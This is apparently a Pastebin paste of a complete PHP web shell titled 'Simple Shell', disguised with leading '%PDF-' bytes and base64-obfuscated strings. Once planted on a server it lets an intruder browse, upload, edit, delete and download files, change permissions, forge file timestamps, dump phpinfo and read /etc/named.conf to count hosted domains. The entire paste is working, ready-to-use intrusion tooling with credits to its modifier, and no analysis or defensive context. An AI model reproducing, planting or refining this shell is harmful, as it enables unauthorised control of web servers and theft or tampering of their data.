willysec_id

Simple Shell

Oct 20th, 2023 (edited)
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.53 KB | Cybersecurity | 0 0
  1. %PDF-
  2. %PDF-
  3. <?php ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),1);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),1);error_reporting(0);function e($n_1b0ecf0b){return base64_encode($n_1b0ecf0b);}function d($n_1b0ecf0b){return base64_decode($n_1b0ecf0b);}if(isset($_GET[base64_decode('aW5mbw==')])&&$_GET[base64_decode('aW5mbw==')]===base64_decode('aW5mbw==')){phpinfo();exit();}foreach($_GET as $w_862575d=>$g_6b643b84){$_GET[$w_862575d]=d($g_6b643b84);}foreach($_POST as $w_862575d=>$g_6b643b84){$_POST[$w_862575d]=d($g_6b643b84);}$m_baab7a10=realpath(isset($_GET[base64_decode('ZGly')])?$_GET[base64_decode('ZGly')]:__DIR__);$m_baab7a10=$m_baab7a10?$m_baab7a10:__DIR__;chdir($m_baab7a10);$w_68567b2f=base64_decode('ZGlyPQ==').e($m_baab7a10);if(isset($_GET[base64_decode('ZGw=')])){if(!realpath($_GET[base64_decode('ZGw=')])){exit();}header(base64_decode('Q29udGVudC1EZXNjcmlwdGlvbjogRmlsZSBUcmFuc2Zlcg=='));header(base64_decode('Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0='));header(base64_decode('Q29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9Ig==').basename($_POST[base64_decode('ZGw=')]).base64_decode('Ig=='));readfile($_GET[base64_decode('ZGw=')]);exit();}function size($x_b548b0f,$y_7252f046=0){$d_b19943ce=filesize($x_b548b0f);$d_ed38ec00=floor((strlen($d_b19943ce)-1)/3);if($d_ed38ec00>0){$v_f51ba0e8=base64_decode('S01HVA==');}return sprintf("%.{$y_7252f046}f",$d_b19943ce/pow(1024,$d_ed38ec00)).@$v_f51ba0e8[$d_ed38ec00-1].base64_decode('Qg==');}function perms($x_b548b0f){clearstatcache();$p_7d2299b1=fileperms($x_b548b0f);$h_8cdc1683=[base64_decode('VQ=='),base64_decode('cA=='),base64_decode('Yw=='),base64_decode('VQ=='),base64_decode('ZA=='),base64_decode('VQ=='),base64_decode('Yg=='),base64_decode('VQ=='),base64_decode('cg=='),base64_decode('VQ=='),base64_decode('bA=='),base64_decode('VQ=='),base64_decode('cw=='),base64_decode('VQ=='),base64_decode('VQ=='),base64_decode('VQ=='),];$c_cb893157=$h_8cdc1683[$p_7d2299b1>>12].implode('',array_map(function($d_71beeff9,$v_e101f268){return $d_71beeff9==base64_decode('MQ==')?$v_e101f268:base64_decode('LQ==');},str_split(decbin($p_7d2299b1&0xfff).''),str_split(base64_decode('cnd4cnd4cnd4'))));return $c_cb893157.base64_decode('IA==').substr(sprintf(base64_decode('JW8='),@fileperms($x_b548b0f)),-4);}if(!function_exists(base64_decode('cG9zaXhfZ2V0cHd1aWQ='))&&!extension_loaded(base64_decode('cG9zaXg='))){function posix_getpwuid($h_8cdc1683){return[base64_decode('bmFtZQ==')=>base64_decode('LS0t')];}}?><!doctypehtml><html><head><meta content="width=device-width,initial-scale=0.5,user-scalable=yes"name="viewport"><title>Simple Shell</title><style>body,button,html,input{background:#000;color:gray;font-family:monospace}a{color:gray;text-decoration:none}button,input{border:1px solid gray;height:1.7em}table{width:100%;border:1px dotted gray;border-spacing:0}tr:hover{background:#161616}td,th{padding:2px 0;border:1px solid #666}textarea{width:80%;height:50vh;background:#000;color:green;tab-size:4}.btn{border:1px solid #666;border-radius:.3em;padding:0 .3em;display:inline-block;text-align:center}.btn:hover{border-color:#fff;background-color:#000;transition:background-color .2s linear}.directory{background:#444654}.directory:before{content:"DIR/";color:gray}.file{background:#343641}.file:before{content:"-";color:gray}.notwritable,.notwritable a{color:#ff7800}.writable,.writable a{color:#49ff00}.symlink{float:right;color:#e2c275}.icon{font-size:1.5em;padding:.1em .2em;margin:0}.delete:before{content:"\1F6AE";opacity:.7}.rename:before{content:"\270D";color:#00f}.download:before{content:"\2193\2193";color:green}.openlink:before{content:"\1F517"}.success{color:#ff0}.success:before{content:"\270C"}.failed{color:red}.failed:before{content:"\2622"}</style><script>function e(e){return btoa(e)}function chmod(n,r){var t=prompt("CHMOD:",r);return!!t&&(n.href+="&new="+e(t),!0)}function chtime(n,r){var t=prompt("Change modified time:",r);return!!t&&(n.href+="&new="+e(t),!0)}function rename(n,r){var t=prompt("Rename:",r);return!!t&&(n.href+="&new="+e(t),!0)}</script></head><body>YOUR IP:<?php echo $_SERVER[base64_decode('UkVNT1RFX0FERFI=')];?><br>SERVER IP:<?php echo gethostbyname($_SERVER[base64_decode('SFRUUF9IT1NU')]).base64_decode('IC8g').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')];?><br><?php function symlinkDomain($d_61f9d063){$h_71a305bf=@file(base64_decode('L2V0Yy9uYW1lZC5jb25m'),false);if(!$h_71a305bf){$d_61f9d063=base64_decode('PGZvbnQgY29sb3I9cmVkIHNpemU9M3B4PkNhbnQgUmVhZCBbIC9ldGMvbmFtZWQuY29uZiBdPC9mb250Pg==');$GLOBALS[base64_decode('bmVlZF90b191cGRhdGVfaGVhZGVy')]=base64_decode('dHJ1ZQ==');}else{$e_85d94462=0;foreach($h_71a305bf as $w_1dea4611){if(@strstr($w_1dea4611,base64_decode('em9uZQ=='))){preg_match_all(base64_decode('I3pvbmUgIiguKikiIw=='),$w_1dea4611,$s_8c7bbf9d);flush();if(strlen(trim($s_8c7bbf9d[1][0]))>2){flush();$e_85d94462++;}}}$d_61f9d063="$e_85d94462 Domain";}return $d_61f9d063;}?>DOMAIN ON SERVER :<?=symlinkDomain($d_61f9d063)?><br><a href="?info=info"class="btn"target="__blank">SERVER INFO</a>:<?php echo php_uname();?><br><form action="?<?php echo $w_68567b2f;?>"enctype="multipart/form-data"method="post"><input class="<?php echo is_writable($m_baab7a10)?base64_decode('d3JpdGFibGU='):base64_decode('bm90d3JpdGFibGU=');?>"name="file"type="file"><button type="submit">Upload</button></form><center><?php if(isset($_FILES[base64_decode('ZmlsZQ==')])){if(move_uploaded_file($_FILES[base64_decode('ZmlsZQ==')][base64_decode('dG1wX25hbWU=')],basename($_FILES[base64_decode('ZmlsZQ==')][base64_decode('bmFtZQ==')]))){echo base64_decode('PHNwYW4gY2xhc3M9InN1Y2Nlc3MiPlVQTE9BRCBTVUNDRVNTITwvc3Bhbj4=');}else{echo base64_decode('PHNwYW4gY2xhc3M9ImZhaWxlZCI+VVBMT0FEIEZBSUxFRCE8L3NwYW4+');}}if(isset($_GET[base64_decode('ZmlsZQ==')])){if(isset($_POST[base64_decode('ZWRpdA==')])){if(@file_put_contents($_GET[base64_decode('ZmlsZQ==')],$_POST[base64_decode('ZWRpdA==')])){echo base64_decode('PHNwYW4gY2xhc3M9InN1Y2Nlc3MiPkVESVQgU1VDQ0VTUyE8L3NwYW4+');}else{echo base64_decode('PHNwYW4gY2xhc3M9ImZhaWxlZCI+RURJVCBGQUlMRUQhPC9zcGFuPg==');}}echo base64_decode('PGZvcm0gYWN0aW9uPSI/ZmlsZT0=').e($_GET[base64_decode('ZmlsZQ==')]).base64_decode('Jg==').$w_68567b2f.base64_decode('IiBtZXRob2Q9InBvc3QiIG9uc3VibWl0PSJlZGl0LnZhbHVlPWUoZWRpdC52YWx1ZSkiPjx0ZXh0YXJlYSBpZD0iZWRpdCIgbmFtZT0iZWRpdCI+').htmlspecialchars(file_get_contents($_GET[base64_decode('ZmlsZQ==')]),ENT_QUOTES|ENT_SUBSTITUTE|ENT_COMPAT,base64_decode('VVRGLTg=')).base64_decode('PC90ZXh0YXJlYT48YnV0dG9uPlVwZGF0ZTwvYnV0dG9uPjwvZm9ybT4=');}if(isset($_GET[base64_decode('ZGVsZXRl')])){$h_8cdc1683=str_replace(base64_decode('WA=='),'',base64_decode('WHVYblhsWGlYblhrWA=='));if($h_8cdc1683($_GET[base64_decode('ZGVsZXRl')])){echo base64_decode('PHNwYW4gY2xhc3M9InN1Y2Nlc3MiPkRFTEVURSBTVUNDRVNTITwvc3Bhbj4=');}else{echo base64_decode('PHNwYW4gY2xhc3M9ImZhaWxlZCI+REVMRVRFIEZBSUxFRCE8L3NwYW4+');}}if(isset($_GET[base64_decode('Y2htb2Q=')],$_GET[base64_decode('bmV3')])){if(chmod($_GET[base64_decode('Y2htb2Q=')],intval($_GET[base64_decode('bmV3')],8))){echo base64_decode('PHNwYW4gY2xhc3M9InN1Y2Nlc3MiPkNITU9EIFNVQ0NFU1MhPC9zcGFuPg==');}else{echo base64_decode('PHNwYW4gY2xhc3M9ImZhaWxlZCI+Q0hNT0QgRkFJTEVEITwvc3Bhbj4=');}}if(isset($_GET[base64_decode('Y2h0aW1l')],$_GET[base64_decode('bmV3')])){if(touch($_GET[base64_decode('Y2h0aW1l')],intval(strtotime($_GET[base64_decode('bmV3')])))){echo base64_decode('PHNwYW4gY2xhc3M9InN1Y2Nlc3MiPlRJTUUgTUFDSElORSBTVUNDRVNTITwvc3Bhbj4=');}else{echo base64_decode('PHNwYW4gY2xhc3M9ImZhaWxlZCI+VElNRSBNQUNISU5FIEZBSUxFRCE8L3NwYW4+');}}if(isset($_GET[base64_decode('cmVuYW1l')],$_GET[base64_decode('bmV3')])){if(rename($_GET[base64_decode('cmVuYW1l')],$m_baab7a10.base64_decode('Lw==').basename($_GET[base64_decode('bmV3')]))){echo base64_decode('PHNwYW4gY2xhc3M9InN1Y2Nlc3MiPlJFTkFNRSBTVUNDRVNTITwvc3Bhbj4=');}else{echo base64_decode('PHNwYW4gY2xhc3M9ImZhaWxlZCI+UkVOQU1FIEZBSUxFRCE8L3NwYW4+');}}$g_6037415=[];$j_6354059=[];foreach(scandir($m_baab7a10)as $i_82079eb1){if(is_dir($m_baab7a10.base64_decode('Lw==').$i_82079eb1)){if($i_82079eb1!=base64_decode('Lg==')){$g_6037415[]=$m_baab7a10.base64_decode('Lw==').$i_82079eb1;}}else{$j_6354059[]=$m_baab7a10.base64_decode('Lw==').$i_82079eb1;}}?></center><form onsubmit="dir.value=e(dir.value)">Directory: <input class="<?php echo is_writable($m_baab7a10)?base64_decode('d3JpdGFibGU='):base64_decode('bm90d3JpdGFibGU=');?>"name="dir"id="dir"style="width:500px"value="<?php echo $m_baab7a10;?>"><button>GO</button><a href="?dir=<?php echo e(realpath($_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')]));?>">[Root Path]</a><a href="?dir=<?php echo e(realpath(__DIR__));?>">[Shell Path]</a></form><table><tr><th></th><th>SIZE</th><th>Modified Date</th><th>PERMS</th><th>ACTION</th></tr><?php foreach(array_merge($g_6037415,$j_6354059)as $x_b548b0f){$b_98dd4acc=is_dir($x_b548b0f);$j_1c630b12=is_writable($x_b548b0f);?><tr><td class="<?php echo($b_98dd4acc?base64_decode('ZGlyZWN0b3J5'):base64_decode('ZmlsZQ==')).base64_decode('IA==').($j_1c630b12?base64_decode('d3JpdGFibGU='):base64_decode('bm90d3JpdGFibGU='));?>"><a href="?<?php echo $b_98dd4acc?base64_decode('ZGlyPQ==').e($x_b548b0f).'':base64_decode('ZmlsZT0=').e($x_b548b0f).base64_decode('Jg==').$w_68567b2f;?>"><?php echo htmlspecialchars(basename($x_b548b0f));?></a><?php echo is_link($x_b548b0f)?base64_decode('PHNwYW4gY2xhc3M9InN5bWxpbmsiPg==').readlink($x_b548b0f).base64_decode('PC9zcGFuPg=='):'';?></td><td><?php echo $b_98dd4acc?base64_decode('LS0t'):size($x_b548b0f);?></td><td><a href="?chtime=<?php echo e($x_b548b0f).base64_decode('Jg==').$w_68567b2f;?>"class="btn"onclick='return chtime(this,"<?php $f_d830a782=date(base64_decode('TS1kLVkgSDppOnM='),filemtime($x_b548b0f));echo $f_d830a782;?>")'><?php echo $f_d830a782;?></a></td><td><a href="?chmod=<?php echo e($x_b548b0f).base64_decode('Jg==').$w_68567b2f;?>"class="btn"onclick='return chmod(this,"<?php echo substr(sprintf(base64_decode('JW8='),@fileperms($x_b548b0f)),-4);?>")'><?php echo perms($x_b548b0f);?></a></td><td><?php if(basename($x_b548b0f)!==base64_decode('Li4=')){?><a href="?delete=<?php echo e($x_b548b0f).base64_decode('Jg==').$w_68567b2f;?>"class="btn icon delete"onclick='return confirm("Sure to delete?")'title="Delete"></a><a href="?rename=<?php echo e($x_b548b0f).base64_decode('Jg==').$w_68567b2f;?>"class="btn icon rename"onclick='return rename(this,"<?php echo basename($x_b548b0f);?>")'title="Rename"></a><?php if(!$b_98dd4acc){echo base64_decode('PGEgdGl0bGU9IkRvd25sb2FkIiBjbGFzcz0iYnRuIGljb24gZG93bmxvYWQiIGhyZWY9Ij9kbD0=').e($x_b548b0f).base64_decode('Ij48L2E+');}}?></td></tr><?php }?></table>Modified By #No_Identity :: <a href="https://github.com/yon3zu">github.com/yon3zu</a> - <a href="https://linuxploit.com/">linuxploit.com</a></body></html>
Add Comment
Please, Sign In to add comment